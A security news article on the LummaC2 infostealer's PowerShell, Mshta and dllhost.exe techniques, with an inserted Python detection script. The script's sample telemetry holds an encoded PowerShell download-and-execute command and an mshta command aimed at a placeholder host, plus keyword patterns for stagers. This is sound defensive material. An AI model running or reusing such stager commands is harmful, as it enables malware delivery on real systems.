LummaC2 reemerged, now hides itself using PowerShell tactics

September 3, 2024
Tags: LummaC2, Infostealer, Malware, Cybercrime, PowerShell

The notorious information-stealing malware dubbed LummaC2 has reemerged in the cybercriminal landscape to access and exfiltrate sensitive information. According to reports, this latest strain adopts complex strategies that pose a considerable threat to targeted computers.

Researchers first spotted this threat after it appeared in Russian-speaking forums a couple of years ago. It is a C-based tool distributed as Malware-as-a-Service (MaaS) that caters to various threat groups in their cybercriminal operations.

The malware authors allegedly developed this infostealer to steal sensitive data, such as credentials and personal information, from infected endpoints. However, research revealed that the new strain’s initial attack vector now uses obfuscated PowerShell commands to download and execute payloads.

To carry out its activity, the malware frequently leverages legitimate Microsoft binaries known as LOLBins (Living-off-the-Land binaries), such as Mshta.exe and Dllhost.exe.

The new LummaC2 variant uses a PowerShell command to download additional malicious scripts that extend the damage on the infected endpoint.

The latest LummaC2 infection unfolds in multiple stages. The initial stage is an encoded PowerShell command that downloads further malicious scripts and files.

The malware then decrypts and runs the malicious payloads on the target device, frequently disguising them as legitimate files to bypass security detection. In addition, LummaC2 utilises Mshta.exe to launch HTML Application (HTA) files as its initial payload. This tactic allows the malware to remain inconspicuous by relying on trusted Windows binaries.

It also establishes persistence through common registry autostart locations, giving its operators continuous access to compromised machines. Furthermore, the malware communicates with a C2 server using POST requests to exfiltrate data and receive instructions.

The infection also employs the dllhost.exe process for communication, allowing attackers to control the infected system remotely. The most concerning aspect, however, is the breadth of LummaC2’s techniques, which map to several MITRE ATT&CK entries, including Process Injection (T1055) and Persistence via Registry Modification (T1547.001).
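Detection logic for the chain described above (encoded PowerShell stage, Mshta.exe launching an HTA, dllhost.exe acting as a C2 host, Run-key persistence), as an added example that is not from the article or from any vendor tool. It runs over constructed Sysmon-style events; the URL, GUID and SID in them are placeholders, and it assumes that legitimate COM surrogate instances of dllhost.exe carry a /Processid:{GUID} argument, so an instance without one is flagged.

```python
import base64
import re

# Constructed Sysmon-like sample telemetry (not from the article); the URL, GUID and SID are placeholders.
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/a.ps1')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    {"type": "proc", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"type": "proc", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://stage.invalid/loader.hta"},
    {"type": "proc", "image": r"C:\Windows\System32\dllhost.exe", "cmdline": "dllhost.exe"},
    {"type": "proc", "image": r"C:\Windows\System32\dllhost.exe",   # benign COM surrogate form
     "cmdline": "dllhost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}"},
    {"type": "reg", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
]

ENC_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)   # -e, -enc, -EncodedCommand ...
STAGER_WORDS = ("downloadstring", "downloadfile", "webclient", "invoke-webrequest", "iex")
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
COM_SURROGATE_RE = re.compile(r"/processid:\{[0-9a-f-]{36}\}", re.I)

def decode_encoded_command(cmdline):
    """Decoded -EncodedCommand payload (base64 of UTF-16LE), or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Return the label of the first rule an event trips, or None when it looks benign."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if event["type"] == "reg":
        return "T1547.001 Run-key persistence" if RUN_KEY_RE.search(event["target"]) else None
    cmd = event["cmdline"]
    if image == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded and any(w in decoded.lower() for w in STAGER_WORDS):
            return "encoded PowerShell downloader (initial stage)"
    elif image == "mshta.exe" and re.search(r"https?://|\.hta\b", cmd, re.I):
        return "mshta.exe launching HTA payload"
    elif image == "dllhost.exe" and not COM_SURROGATE_RE.search(cmd):
        return "dllhost.exe without /Processid (possible injected C2 host, T1055)"
    return None

def detect(events):  # (index, label) for every event that trips a rule
    return [(i, lab) for i, e in enumerate(events) if (lab := classify(e))]
```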

Organisations should deploy stronger endpoint monitoring and layered security controls to counter these sophisticated threats.